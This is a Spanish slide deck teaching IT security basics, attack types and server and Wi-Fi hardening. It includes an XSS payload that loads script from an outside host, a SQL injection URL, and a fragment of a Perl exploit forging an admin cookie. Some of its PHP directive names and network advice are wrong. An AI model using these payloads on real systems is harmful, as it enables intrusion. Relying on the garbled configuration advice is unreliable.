SlideShare a Scribd company logo
1 of 105
Seguridad Informática y
         de TI
Seguridad Informática:
   La seguridad en informática consiste en asegurar que
los recursos del sistema de información, como data,
servicios o programas de una organización, sean
utilizados de la manera que se decidió y que el acceso a
la información allí contenida, así como su modificación,
sólo sea accesible a las personas que se encuentren
acreditadas y dentro de los límites de su autorización.
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA

No existe la absoluta seguridad !!



       Todo es rompible si se le aplica fuerza. Una caja de
       vidrio se puede romper, pero también una caja fuerte
       de titanio. ¿Qué es más seguro: la caja de vidrio o la
       de titanio?

       Evidentemente la de titanio, pero esto depende
       solamente de que herramienta utilicemos para
       romperla.

       Todo se puede vulnerar. La única razón por la cual
       utilizamos rejas de fierros en nuestras casas y los
       bancos es porque hace que el ataque sea más lento.
Debemos enfocarnos en REDUCIR EL RIESGO, y no en
tratar de eliminar las amenazas, ya que es imposible.


Para eso debemos saber de QUE o QUIENES nos
protegemos y también COMO nos atacan.
“Si te conoces a ti mismo y
conoces a tu enemigo, entonces
no deberás temer el resultado de
           mil batallas”
      Sun-Tzu, El Arte de la Guerra
¿De donde surge la seguridad?
• “Tecnológicamente, la seguridad es GRATIS”
  – YA HAS PAGADO POR ELLA: Los sistemas
    operativos     modernos     contienen    muchas
    características de seguridad. ¿Las conoces?¿Las
    usas?
  – LAS MEJORES HERRAMIENTAS DE SEGURIDAD
    SON OPEN SOURCE. (excepto los antivirus)
Metas en la seguridad

    Integridad: La información sólo puede ser modificada por
    quien está autorizado y de manera controlada.

    Confidencialidad: La información sólo debe ser legible
    para los autorizados.

    Disponibilidad: Debe estar disponible cuando se necesita.

    Irrefutabilidad (No repudio): El uso y/o modificación
    de la información por parte de un usuario debe ser
    irrefutable, es decir, que el usuario no puede negar dicha
    acción.
Componentes de Seguridad
• Seguridad Fisica = Proteger de acceso fisico a
  personas no autorizadas.
• Seguridad Operacional = Medidas de seguridad
  aplicadas a las operaciones del negocios.(Access
  c
  control,autenticazion, backups y disaster recovery)
• Seguridad Administrativa = Esta es la parte del
  triangulo donde se implementan las guias, reglas y
  procedimientos a nivel administrativo.
  (
  (politicas,requerimientos de software,Etc..)
¿Qué es Vulnerabilidad?
• Un agujero de seguridad es un fallo en un programa que
  permite mediante su explotación violar la seguridad de un
  sistema informático.
• Una vulnerabilidad por lo general permite que el atacante
  pueda engañar a la aplicación, por ejemplo, esquivando los
  controles de acceso o ejecutando comandos en el sistema
  donde se aloja la aplicación.

• UNO DE LOS BAKDOORS MAS FAMOSOS LOS TUVO WINDOWS XP


   Aquí recordaremos aquel agujero de seguridad de Windows
          a través de los temporales de internet (2007)
Otro ejemplo de vulnerabilidad (no tan
relevante, pero igual interesante)

     Con ustedes el buscaminas
Factores que hacen a un sistema más
            vulnerable
 
     Código sin confirmar - Un código en un diskette, en CD-ROM o
     USB, se puede ejecutar por la irresponsabilidad o ignorancia del
     usuario.
 
     Defectos - La mayoría de los sistemas contienen errores que se
     pueden aprovechar por el malware, mientras no se ponga el
     parcho correspondiente.
 
     Homogeneidad - Cuando todas las computadoras en una red
     funcionan con el mismo sistema operativo, si pueden corromper
     ese SO, podrán afectar cualquier computadora en el que
     funcione.
 
     Sobre-privilegios del código - La mayoría de los sistemas
     operativos permiten que el código sea ejecutado por un usuario
     con todos los derechos.
 
     Sobre-privilegios del usuario - Algunos sistemas permiten que
     todos los usuarios modifiquen sus estructuras internas.
SEGURIDAD EN AMBIENTE DE SERVIDORES
      Y PLATAFORMAS WEB
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB



    Ataques Internos

    - Premeditación (Empleados mal intencionados o ex empleados con
    información privilegiada)
    - Descuido
    - Ignorancia
    - Indiferencia de las politicas de seguridad

    Ataques externos

    -- Hackers, Crackers, Lammers, Script-Kiddies
    -- Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen
    test), etc.
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB



   Ataques Internos

   • Suplantación de identidad
   • Sniffing (Incluso administradores pueden hacer sniffing.
   Sugerencia: CIFRAR)
   • Robo de información (Ej: para la competencia)
   • Virus, Troyanos, Gusanos
   • Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc
    Keylogging - Keycatching



     Keycatcher:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB


   Ataques Externos

   • Ataques contra servicios WEB
   • Cross Site Scripting (XSS)
   • SQL Injection
   • Exploits
   • Robo de Identidad
   • Denegación de Servicio (DoS) y Denegación de Servicio
      Distribuido (DDoS)
   • SPAM
   • VIRUS
   • Phishing (Whishing, Hishing)
   • Troyanos
XSS
SEGURIDAD EN AMBIENTE DE SERVIDORES   Y PLATAFORMAS WEB
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB




XSS:
http://docs.info.apple.com/article.html?
artnum=';a=document.createElement('script');a.src='http://h4k.in/i.j
s';document.body.appendChild(a);//';alert(1)//%22;alert(2)//
%22;alert(3)//--%3E

SQL Injection:

http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT
TOP 1 login_name FROM admin_login--
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB




Ejemplo de un exploit en PERL:

   #!/usr/bin/perl
   use LWP::UserAgent;
   use HTTP::Cookies;
   $host=shift;
   if ($host eq "") {
   print "Usage: webeye-xp.pl <host name>n";
   exit;
   }
   my $browser = LWP::UserAgent->new();
   my $resp = $browser->get("http://$host/admin/wg_user-
   info.ml","Cookie","USER_ID=0; path=/;");
   $t = $resp->content;
   #print $t;
   ";
Algo breve sobre Cookies
Las cookies son pequeños archivos de texto que el navegador almacena
   en el ordenador del usuario, cuando se visitan páginas Web.
• Las cookies almacenan información que se utiliza con varios fines:
         • Para personalizar la página Web y su navegación para cada usuario.
         • Para recoger información demográfica sobre cuántos usuarios visitan la
           página y su tiempo de estancia en ella.
         • Para realizar un seguimiento de qué banners se muestran al usuario, y
           durante cuánto tiempo.
•   Estos usos no tienen un carácter malicioso, al menos en principio. Sin
    embargo, es necesario tener en cuenta que toda información personal que
    se introduzca en una página Web se puede almacenar en una cookie,
    incluyendo el número de la tarjeta de crédito.
•   Además, las cookies también se pueden utilizar para formar un perfil del
    usuario, con información que éste no controla, y que después puede ser
    enviada a terceros, con la consiguiente amenaza para la privacidad.
Y ya hablamos de exploit, hablemos de:

                El Script boy o Script Kiddie
Definición. Persona que presume de ser un hacker o cracker sin que posea un grado
de conocimientos suficientes. Usa normalmente cracks, exploits y programas
similares construidos por personas con grandes conocimientos pero cuyo uso está al
alcance de cualquiera.




Para ahora recordar los exploits, como antaño
Veamos que llegó
El delito ya esta cometido ahora el
atacante revisa su correo,
el que uso para recibir la
contraseña de la victima
Contraseña
   e IP
Esta fue una de las maneras más usadas para obtener la contraseña de
otra persona de las muchas maneras que se pueden usar como:

KEYLOGERS programas que capturan todo lo que se hace por el teclado

O algunas personas aprovechan las vulnerabilidades de Windows y los
Agujeros de seguridad para obtener la ansiada contraseña por ejemplo
Desencriptar el registro de Windows para abrir un cookie
Brevemente:
Los Keylogger
  Programa que intercepta todas las pulsaciones
realizadas en el teclado (e incluso a veces también
el Mouse), y las guarda en un archivo para obtener
datos sensibles como contraseñas, etc. Este archivo
puede ser enviado por un troyano a un usuario de
PC, vía mail, chat o descargando un archivo exe.
Brevemente:
    El Spyware
•   Los programas espía, también conocidos como spyware, son aplicaciones
    informáticas que recopilan información personal del usuario sin su
    consentimiento, como por ejemplo software presente en el ordenador, hábitos
    de uso de Internet, páginas visitadas, etc. Posteriormente, transmiten esta
    información a terceros, tales como empresas de publicidad u otras
    compañías interesadas en dichos datos, con la consiguiente violación de la
    privacidad.
•   Los programas espía llegan al ordenador a través de distintas vías:
    mediante un troyano, que los instala sin consentimiento del usuario; cuando se
    visita una página Web que incluye determinados controles ActiveX o código
    que explota una determinada vulnerabilidad.
•   Además de las acciones descritas, el spyware tiene una serie de efectos
    colaterales: consume recursos del sistema, ralentiza el funcionamiento del
    ordenador, causa fallos en el sistema, etc.
Y más brevemente:
Los backdoors

• (Puerta trasera) Defecto en un software o página Web que
  permite ingresar a una determinada parte de los mismos
  que usualmente está restringida a un usuario ajeno. No
  siempre es un defecto (bug), también puede ser una entrada
  secreta de los programadores o webmasters con diversos
  fines. Ej.: una página Web tiene clave de acceso para
  ingresar, pero existe una determinada dirección que nos
  permite entrar saltando la misma. Uno de los más usados es
  Back Orifice creado específicamente para entrar en
  sistemas operativos Windows usando troyanos.
Y super breve:
   El Phishing
• El phishing consiste en el envío de correos
  electrónicos que, aparentando provenir de
  fuentes fiables (por ejemplo, entidades bancarias),
  intentan obtener datos confidenciales del
  usuario. Para ello, suelen incluir un enlace que, al
  ser pulsado, lleva a páginas Web falsificadas. De esta
  manera, el usuario, creyendo estar en un sitio de toda
  confianza, introduce la información solicitada que, en
  realidad, va a parar a manos del estafador.
En este ejemplo, el propio correo incluye un formulario en lugar de ofrecer un enlace a
una página falsa. Si el usuario introduce sus datos y envía el formulario, estos son
finalmente recogidos en un servidor ubicado en Taiwán.
Y QUE HAY DEL SPAM
       72% del correo electrónico mundial es Spam
                            Fuente:Ironport, 2010.


      Objetivos:
        ▪ Ganar Notoriedad
       •   Dañar empresas internacionales
       •   Recolectar datos (ratware, pictionary, spiders, crawlers)
       •   Cometer delitos (spoofing, pishing, etc.)
       •   Publicidad pagada por el usuarios y a costo mínimo para el emisor



      Beneficios:
       • De tipo económico
       * Contratados por empresas
       * Venta de datos
       • Reconocimiento




¿POR QUÉ EXISTE?
ES UN NEGOCIO QUE GENERA PUBLICIDAD Y BENEFICIOS ECONÓMICOS CASI SIN
COSTO
    ¡¡¡¡UN SPAMMER PUEDE GANAR 8000 USD POR DÍA!!!!
             Fuente: Reporte Resultados Reunión Busan, Task Force on Spam OECD, Septiembre 2010.
CONSECUENCIAS DEL SPAM

       GENERA IMPORTANTES COSTOS
   •    Daña la productividad

   •    Daña la competitividad de las empresas

                            * Tiempo de entrega y respuesta
                            * Confiabilidad

                                                       Uso inútil de banda ancha
        Daño a la infraestructura informática          Denegación servicio por saturación
                                                       Transmisión de virus y gusanos
   •    Juicios


                    Pérdida de recursos por los que paga (saturación)
       A Usuarios Paga publicidad que no solicito
                    Pérdida de información por combate (sobrefiltrado)
       Traslado de costos de combate por ISPs


                     Costos por Ancho de Banda
       A ISPs        Costos por inversión en herramientas para su combate
                     Costos en imagen


   IMPLICACIÓN DEL SPAM EN LAS TELECOMUNICACIONES

   Existe un daño con respecto a la operación segura de las redes públicas de telecomunicaciones y al uso
   eficiente de su capacidad y recursos para su mejor aprovechamiento, logrando servicios de
   telecomunicaciones de calidad, en beneficio de los usuarios
PREVENCIÓN
•No abras y elimina todo mensaje cuyo título o emisor (personas o empresas)
te resulte sospechoso o desconocido;

•Sé cuidadoso al abrir los archivos adjuntos, pueden contener virus que se
activan al abrirlos;

•Instala un firewall y un antivirus. Actualízalos frecuentemente;

•Instala un filtro de Spam o suscríbete al de tu prestador de servicios de
internet;

•Utiliza diversas direcciones de correo, por ejemplo, una cuenta de trabajo y
una cuenta personal solo para mensajes a personas confiables y conocidas;

•Si te es solicitada información confidencial mediante mensaje aparente de tu
banco o compañía crediticia, verifica su veracidad por teléfono.

•Si envías mensajes a un gran número de destinatarios, usa el campo de copia ciega BCC, de esta forma las direcciones no
son visibles a otros;

•Usa un programa de encriptación para tus mensajes, así aseguras que el contenido sólo sea visto por el destinatario;

•No compres, ni respondas a mensajes comerciales de empresas dudosas. No respondas solicitando tu eliminación de la
lista, con ello aseguras al spammer la validez de tu cuenta de correo, lo que llevará a que aparezca en más listas y bases
de datos;

•No respondas a cadenas o a reportes de falso virus (hoax), ni atiendas a sus solicitudes de reenvío. Estos reportes te
impulsan a tomar supuestas medidas contra el virus, que en realidad te llevarán a provocar daños a tu equipo;

•Verifica siempre la necesidad e identifica la identidad real del destinatario cuando proporciones tu información confidencial
vía Internet o e-mail;

•Considera siempre a quién proporcionas tus datos de contacto, tales como dirección de correo electrónico o número
celular, previniendo quién podría tener acceso a él después.
CONVIRTIENDO NUESTROS SERVICIOS EN FORTALEZAS
LOS MANDAMIENTOS MAS IMPORTANTES
           DE SEGURIDAD

 Siempre respetar las políticas de seguridad
 Siempre tener nuestros servicios actualizados a la última versión
conocida estable
 Utilizar mecanismos de criptografía para almacenar y transmitir
datos sensibles
 Cambiar las claves cada cierto tiempo
 Auto-auditar nuestros propios servicios. Autoatacarnos para saber
si somos o no vulnerables
 Estar siempre alerta. Nunca pensar ”a nosotros nadie nos ataca”.
 No dejar respaldos con información sensible en directorios web
 No usar las mismas claves para servicios distintos (ej, la clave de
root sea la misma que la de MySQL)
SERVICIOS DE INTERNET

 - Cambiar los puertos por defecto

 - Garantizar el acceso solo a cuentas específicas

 - Aplicar técnicas de Hardening

 - Para servicios privados y confidenciales utilizar túneles seguros (VPN
cifradas) en Internet y redes no seguras

 - Eliminar todos los banners posibles y sobre todo las versiones

 - Habilitar módulos de seguridad (Ej mod_security en Apache)

 - Levantar Firewalls e IDS/IPS

 - Crear cuentas de sistema restringidas (aunque no tengan privilegios)
SERVICIOS DE INTERNET




 - Nunca trabajar con ”root” si no es estrictamente necesario

 - Proteger con doble contraseña si es posible

 - Elegir contraseñas seguras, mezclando mayúsculas, minúsculas, números y
caracteres especiales. Las claves no deben ser palabras coherentes (ej: Admin25)

 - Cerrar puertos y eliminar aplicaciones innecesarias

 - Borrar robots.txt y estadísticas públicas

 - Proteger las URL (ej: mod_rewrite)
SERVICIOS DE INTERNET



  - Tener cuidado con los archivos temporales en directorios WEB. Ejemplo:
index.php~ (terminados en caracter “squiggle” o “pigtail (literalmente: cola de
chancho)”

 - Realizar respaldos periódicamente y probar que funcionen

 - Conocer las técnicas de ataque más conocidas

- Auditar los códigos con herramientas de seguridad

- Si ejecutan algún servidor de base de datos, permitir solamente comunicación con
interfaz loopback y no dejar sin contraseña las bases de datos.

- En lo posible no utilizar servicios como:
   - WEBMIN
   - phpMyAdmin
   - Interfaces WEB en routers o dispositivos de red
UN POCO MAS DE SEGURIDAD CON APACHE Y PHP


Apache. En httpd.conf activar las siguientes directivas:

ServerTokens Prod
ServerSignature Off
ServerAdmin <direccion@decorreo.com>

habilitar mod_security y mod_rewrite

PHP .En php.ini

php_expose=off
“esconde php”
mode_safe=on
evita que se ejecuten funciones como system(), passthru(), exec(), etc.

evitar scripts con phpinfo();
Algunos ejemplos:
Algunos ejemplos:




Dirección: http://www.sitioweb.com/config.php

                      ESTA PAGINA ES PRIVADA
Algunos ejemplos:




Dirección: http://www.sitioweb.com/config.php~

    <?php

    /*Variables base de datos*/
         $sys['db_host'] = "localhost";
         $sys['db_username'] = "root";
         $sys['db_password'] = "123";
         $sys['db_database'] = "base_de_datos";

    echo "<center>ESTA PAGINA ES PRIVADA";

    ?>
Algunos ejemplos:



Solución al problema anterior: UN CRON QUE ELIMINE LOS ARCHIVOS
TEMPORALES



  /etc/crontab



  */5 * * * * root rm /var/www/*.*~
PROTECCIÓN DE REDES WI-FI
PROTECCIÓN DE REDES WI-FI


EL GRAN PROBLEMA DE LAS REDES WI-FI ES GRAN
EXTENSIÓN FÍSICA (No hay cables) LO QUE CONLLEVA A QUE
SEA MÁS FÁCIL ACCEDER A ELLAS REMOTAMENTE


EXISTEN UNA SERIE DE MEDIDAS QUE SE PUEDEN TOMAR
PARA REDUCIR EL RIESGO DE ATAQUES.
PROTECCIÓN DE REDES WI-FI


 Apagar el router o access point cuando no se ocupe
 Nunca entregar la clave Wi-Fi a terceros
 Utilizar claves de tipo WPA2. Como segunda opción WPA y en el peor
de los casos WEP (128 y 64 bits)
 Habilitar el control de acceso por MAC. Son fáciles de clonar pero pone
una barrera más
 Deshabilitar servicios innecesarios en el router (SNMP, Telnet, SSH,
etc)
 Deshabilitar el acceso inalámbrico a la configuración
 Cambiar los puertos por defecto de los servicios necesarios en el router
(ej: http a 1000)
 Desactivar el broadcasting SSID
 Desactivar DHCP. Utilizar sólo IP manuales dentro de rangos poco
convencionales. (Ej: 90.0.10.0 – 90.0.10.254)
 Usar VPN si fuese posible.
PROTECCIÓN DE REDES WI-FI


 Cambiar regularmente las claves Wi-Fi (tanto administración como
clave de red).
 Guardar bien las claves de administración
 Usar contraseñas complicadas. (Ej: E_aR@_1-x
 No usar dispositivos Wi-Fi cerca de hornos microondas ni teléfonos
inalámbricos
 Realizar un scaneo local de las redes disponibles para evitar
interferencias.
LOS CANALES QUE NO SE INTERFIEREN SON: 1, 6 y 11
HERRAMIENTAS DE SEGURIDAD
HERRAMIENTAS DE SEGURIDAD
                   COMERCIALES




GFI LANGUARD SECURITY SCANNER
www.gfi.com


                                ACUNETIX WEB SCANNER
                                www.acunetix.com



N-Stalker (ex N-Stealth)
www.nstalker.com
HERRAMIENTAS DE SEGURIDAD
                     GRATIS




NMAP (Network Mapper)
www.insecure.org/nmap            NESSUS
                                 www.nessus.org
Scanners de vulnerabilidades
• Esto es una herramienta que permite escanear
  una computadora en una red para
  vulnerabilidades ya conocidas.
• Estas vulnerabilidades pueden ser tanto en la
  red como en el sistema operativo y en
  aplicaciones.
• Ej: Nessus,GFI LANguard,Retina,Sara.
Nessus
Password Cracker
• Es el proceso de recuperar el password de data
  almacenada y/o transmitida por una
  computadora o dispositivo electrónico.
• Vectores de ataques: Encripción debil,
  Adivinar, Ataques por diccionarios,Fuerza
  Bruta (Brute Force).
• Ej. Cain and Abel, John the Ripper,THC Hydra y
  L0phtcrack.
Cain y Abel
Packet sniffer
• Esto es una herramienta que permite capturar
  los paquetes de datas que son transmitidos en
  una red.
• Estos tambien se utilizan en conjunto a
  password crakers.
• Ej.Wireshark, Kismet ,Tcpdump,Ettercap y Cain
  and Abel.
Wireshark
Spoofing attacks
• En esta situación el atacante logra fingir ser un
  servidor o un equipo o una aplicación para
  lograr que sus victimas se comuniquen con el y
  no con el destinatario real.
• Man-in-the-middle attack y URL spoofing
  dsniff,Karma,AirJack,Ettercap y Cain and Abel.
Ettercap
Y para mayor INSEGURIDAD: Google
                                    Hacking

¿Qué es el Google Hacking? Ejemplos
• Muchos de ustedes se preguntaran qué es eso del Google
  Hacking?? Es bien sencillo. El Google Hacking consiste en
  explotar la gran capacidad de almacenamiento de información
  de Google, buscando información específica que ha sido
  añadida a las bases de datos del buscador. Si las búsquedas las
  orientamos a ciertas palabras clave que nos ayuden a
  encontrar información sensible, puntos de entrada sensibles a
  posibles ataques, o cualquier otro tipo de información que
  tuviera carácter de sensibilidad, estaremos ejecutando un
  Google hack. Resumiendo: Google Hacking es buscar en
  Google información sensible, generalmente, con fines
  maliciosos.
Ejemplo
Ejemplo – Datos personales -   direcciones de correo – telefonos – informacion
                                                                       personal
Ejemplo – Directorios sensibles
Ejemplo – ficheros que contienen claves
Ejemplo – Hardware online
Ejemplo – deteccion de servidores Web
Google Hacking

• Mediante esta técnica, es posible encontrar información sobre :
   –   Productos vulnerables
   –   Mensajes de error
   –   Ficheros que contienen información sensible
   –   Ficheros que contienen claves
   –   Ficheros que contienen nombres de usuario
   –   Footholds e información de apoyo al acceso
   –   Páginas con formularios de acceso
   –   Páginas que contienen datos relativos a vulnerabilidades
   –   Directorios sensibles
   –   Información sensible sobre comercio y banca electrónica
   –   Dispositivos hardware online
   –   Ficheros vulnerables
   –   Servidores vulnerables
   –   Detección de servidores web
Google Hacking



¿Cómo impedir ser víctimas de
Google Hacks?
Google Hacking
           ¿Cómo impedir ser víctimas de Google Hacks?


1. Aprenda cómo funciona Google. Conozca y
   experimente las posibilidades de la búsqueda
   avanzada. Entienda que las búsquedas son muy
   refinables y que es un motor de búsqueda muy
   poderoso, que no sólo está pensado para ordenar y
   encontrar páginas web, sino que también pueden
   hallarse documentos ofimáticos, informes, faxes,
   memorandos, notas, fotografías, teléfonos … es
   decir, absolutamente todo lo que sea accesible
   puede acabar en las bases de datos de Google.
Google Hacking
         ¿Cómo impedir ser víctimas de Google Hacks?



1. Una vez entendido el punto primero,
   entienda que igual que podemos usar Google
   para hallar documentos inocuos, podemos
   emplearlo para obtener documentos con
   datos sensibles. Grábeselo en la cabeza. Hay
   gente que vive de este tipo de técnicas y de
   la información que extrae de ellas.
Google Hacking
          ¿Cómo impedir ser víctimas de Google Hacks?


1. Si dispone de página web, asegúrese de
   comprender lo importante que es tener un fichero
   de robots.txt correctamente configurado. Tener una
   página web es algo más que colocar fotos y
   documentos en la Red para que las vean los
   amiguetes. Nuevamente incidimos en que todo lo
   que se coloca en servidores Web es susceptible de
   acabar siendo indexado en las bases de datos de
   Google. Esto es aplicable para cualquier objeto
   accesible desde documentos Web: cámaras web,
   impresoras, etc.
Google Hacking
           ¿Cómo impedir ser víctimas de Google Hacks?


•   No deje de consultar los parámetros que definen el
    mecanismo de posicionamiento de resultados en
    Google. Aplique “posicionamiento inverso” a todo
    aquello que quiera mantener lejos de ojos ajenos.
    Puestos a aparecer, mejor aparecer en el puesto
    doscientos que en el quinto. No está de más usar el
    buscador para aprender cómo funciona el Google
    hacking y aplicar técnicas de inversión aplicadas a su
    caso.
Google Hacking
            ¿Cómo impedir ser víctimas de Google Hacks?


•  Si usted tiene un buen nivel técnico y administra
   máquinas corporativas, quizás debería plantearse no
   sólo la revisión de las políticas de exclusión de robots,
   sino además, debería probar un honeypot
   especializado. Le proponemos Google Hack
   Honeypot. Funciona muy bien y le brindará
   información interesante sobre Google hackers que
   intenten explotar en sus sitios Web este tipo de
   técnicas
2. Sería recomendable también que leyera documentos
   con ideas sobre este honeypot, en caso de que opte
   por emplearlo.
Google Hacking

• Que es un Honeypot??
  – Se denomina Honeypot al software o conjunto de
    computadores cuya intención es atraer a crackers o
    spammers, simulando ser sistemas vulnerables o débiles a
    los ataques. Es una herramienta de seguridad informática
    utilizada para recoger información sobre los atacantes y sus
    técnicas. Los Honeypots pueden distraer a los atacantes de
    las máquinas más importantes del sistema, y advertir
    rápidamente al administrador del sistema de un ataque,
    además de permitir un examen en profundidad del
    atacante, durante y después del ataque al honeypot.
Google Hacking
                                          Honeypot



• Algunos honeypots son programas que se limitan a
  simular sistemas operativos no existentes en la
  realidad y se les conoce como honeypots de baja
  interacción y son usados fundamentalmente como
  medida de seguridad. Otros sin embargo trabajan
  sobre sistemas operativos reales y son capaces de
  reunir mucha más información; sus fines suelen ser de
  investigación y se los conoce como honeypots de alta
  interacción.
Google Hacking
                                        Honeypot



• Un tipo especial de honeypot de baja interacción son
  los sticky honeypots ( honeypots pegajosos) cuya
  misión fundamental es la de reducir la velocidad de
  los ataques automatizados y los rastreos.
• En el grupo de los honeypot de alta interacción nos
  encontramos también con los honeynet.
• También se llama honeypot a un website o sala de
  chat, que se ha creado para descubrir a otro tipo de
  usuarios con intenciones criminales,
PARA REFLEXIONAR
• NOS HEMOS PUESTO A PENSAR QUE
  PODEROSO ES GOOGLE – Y QUE
  IMPRESCINDIBLE EN NUESTRA VIDA WEB.
• MICROSOFT ES UN GIGANTE, PERO EN LA RED
  EL QUE MANDA ES GOOGLE.
• Y LA INTERROGANTE ES: ¿HASTA DONDE
  LLEGARA GOOGLE? ¿CUANTO
  DEPENDEREMOS DE EL EN UN FUTURO?
Tema aparte: los Crackers
                   Aquí algunos Famosos




Fred Cohen            Robert Tappan
                              Morris




                                       Kevin David Mitnick
   Chen Ing- Hou
                                                (maestro)
Herramientas usadas por los crackers
• Las herramientas de cracking son los programas y
  aplicaciones que ayudan al cracker a lograr su fin,
  aunque estos programas no necesariamente
  debieron estar diseñados para ese fin específico.
• Categorías:
  – Desensamblador
  – Ensamblador
  – Depurador (debugger)
  – Editor hexadecimal
  – Compilador
Herramientas usadas por los crackers

• Desensamblador
  – Un desensamblador es un programa de computación que
    traduce desde lenguaje máquina (código binario) al
    lenguaje de programación (assembler).
  – El programa desensamblador a utilizar, por trabajar con
    lenguaje máquina y ensamblador, depende
    exclusivamente del microprocesador que estamos usando
    (para que pueda reconocer las instrucciones del código
    binario), de la arquitectura de la máquina y del sistema
    operativo en uso (no es lo mismo Windows que Linux).
Herramientas usadas por los crackers
• Ensamblador
  – El término ensamblador (del inglés assembler) se refiere a un
    tipo de programa informático que se encarga de traducir un
    fichero fuente escrito en un lenguaje ensamblador, a un
    fichero objeto que contiene código máquina, ejecutable
    directamente por la máquina para la que se ha generado. El
    propósito para el que se crearon este tipo de aplicaciones es
    la de facilitar la escritura de programas, ya que escribir
    directamente en código binario, que es el único código
    entendible por la computadora, es en la práctica imposible. La
    evolución de los lenguajes de programación a partir del
    lenguaje ensamblador originó también la evolución de este
    programa ensamblador hacia lo que se conoce como
    programa compilador.
Herramientas usadas por los crackers

• Depurador
• Un depurador (en inglés, debugger), es un programa
  que permite depurar o limpiar de errores otro
  programa informático.
• Ejemplos de depuradores:
  –   GNU Debugger (gdb)
  –   SoftICE
  –   OllyDbg
  –   Trw2000
  –   Ida Pro
Herramientas usadas por los crackers
•   Editor hexadecimal
•   Un editor hexadecimal (o editor de archivos binarios) es un tipo de programa de
    ordenador que permite a un usuario modificar archivos binarios. Los editores
    hexadecimales fueron diseñados para editar sectores de datos de disquetes o
    discos duros por lo que a veces se llaman "editores de sectores".
•   Utilizando un editor hexadecimal un usuario puede ver o puede redactar el
    contenido intacto y exacto de un archivo al contrario que con la interpretación del
    mismo contenido que otro, de nivel más alto software de aplicaciones puede
    asociar por la extensión de archivo. Por ejemplo, los datos intactos de la imagen
    (los raws), y la manera de interpretar el mismo archivo del software de edición de
    imágenes.
•   En la mayoría de los editores hexadecimales los datos del archivo son
    representados como valores hexadecimales agrupados en dos grupos de 8 bytes y
    un grupo de 16 caracteres ASCII, los caracteres no reconocidos son representados
    normalmente por un punto "." en ASCII.
•   El estándar comando Unix shell es usado para mostrar (aunque no editar) un
    archivo en hexadecimal y octal es od.
Editor hexadecimal ICY Hexplorer
Herramientas usadas por los crackers
• Compilador
  – Un compilador es un programa que, a su vez, traduce un
    programa escrito en un lenguaje de programación a otro
    lenguaje de programación, generando un programa
    equivalente. Usualmente el segundo lenguaje es código
    máquina, pero también puede ser simplemente texto. Este
    proceso de traducción se conoce como compilación.
  – La razón principal para querer usar un compilador es querer
    traducir un programa de un lenguaje de alto nivel, a otro
    lenguaje de nivel inferior (típicamente lenguaje máquina). De
    esta manera un programador puede diseñar un programa en
    un lenguaje mucho más cercano a como piensa un ser humano,
    para luego compilarlo a un programa más manejable por una
    computadora.
Pero también debemos hablar de
              TEMAS MAYORES
Cyber Terrorismo
 Es un término controversial
 Definición mayormente aceptada = Es el
  uso predeterminado de actividades
  perjudiciales o amenazas a sistemas de
  computadoras o networks con la
  intención de causar daño o avanzar su
  causa política, sociales, religiosa o
  ideológica.
Cyber Warfare
   Cyber Warfare = Es el uso de
    computadoras y el internet para conducir
    guerra o guerrillas en el cyberespacio.
   Cyber Guerrero = Individuo alta mente
    versado en las áreas de: programación,
    seguridad informática, redes, espionage y
    computer forensics. Gobiernos, Ejércitos y
    agencias de la ley están entrenando en
    grandes cantidades a sus miembros en
    estas áreas.
PARA TENER SIEMPRE EN CUENTA…
• Que no todos los ataques o problemas de
  seguridad son sofisticados, a veces son meros
  engaños simples (“viveza” o “criollada” acá en
  Perú), como la llamada Ingeniería Social (un
  término más bonito, o como dicen “más cool”,
  o mejor dicho más técnico)
Pero definitivamente lo más dramático
• Es recordar que la seguridad de TI no sólo se
  puede y debe reducir a un ámbito
  empresarial, sino que también debe incluir el
  ámbito       social      colectivo,     pues
  lamentablemente las TI son tan poderosas
  que pueden ser usadas tanto para hacer lo
  correcto, como lo incorrecto y hasta lo más
  indignante como la Pornografía Infantil y la
  Trata de Personas.
• Veamos las dos caras del uso de las TI
PARA FINALIZAR…

 SIEMPRE RECUERDA…
• Cerca del 80% de los ‘ataques’ provienen del interior.


        • No se notifican todos los ataques que se reciben.


         • Muchos accidentes humanos se reportan como ataques.


• No es eficiente hacer una alta inversión puntual y olvidarse durante un
tiempo.
• La seguridad es un proceso, un camino continuo.

• Se tiene que diferenciar de lo que hay que protegerse.
     Errores involuntarios. (Maquinaria y personal)
     Ataques voluntarios. (Internos y externos)
     Desastres naturales.
¿¿PREGUNTAS??
Seguridad informática y de ti

More Related Content

What's hot

Tic protección de datos y equipos
Tic protección de datos y equiposTic protección de datos y equipos
Tic protección de datos y equiposMartín Pachetta
 
Seguridadinformaticaalexicorrea
SeguridadinformaticaalexicorreaSeguridadinformaticaalexicorrea
Seguridadinformaticaalexicorreaalexcore69
 
Ayuda Web Seguridad Romero Gt
Ayuda Web Seguridad Romero GtAyuda Web Seguridad Romero Gt
Ayuda Web Seguridad Romero GtMauricio Romero
 
Seguridad y Alta Disponibilidad: ataques
Seguridad y Alta Disponibilidad: ataquesSeguridad y Alta Disponibilidad: ataques
Seguridad y Alta Disponibilidad: ataquesJesús Moreno León
 
Protección de equipos, documentos y contraseñas
Protección de equipos, documentos y contraseñasProtección de equipos, documentos y contraseñas
Protección de equipos, documentos y contraseñasJorge Luis Sierra
 
Guía de seguridad digital para activistas y defensores
Guía de seguridad digital para activistas y defensoresGuía de seguridad digital para activistas y defensores
Guía de seguridad digital para activistas y defensoresEspacio Público
 
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...Alejandro Ramos
 
Importancia de la Seguridad Informática
Importancia de la Seguridad InformáticaImportancia de la Seguridad Informática
Importancia de la Seguridad InformáticaTita Mazorra Granja
 
1 categorias-ataques
1 categorias-ataques1 categorias-ataques
1 categorias-ataquesmvrodriguez
 
Seguridad en la web no confíes en el usuario
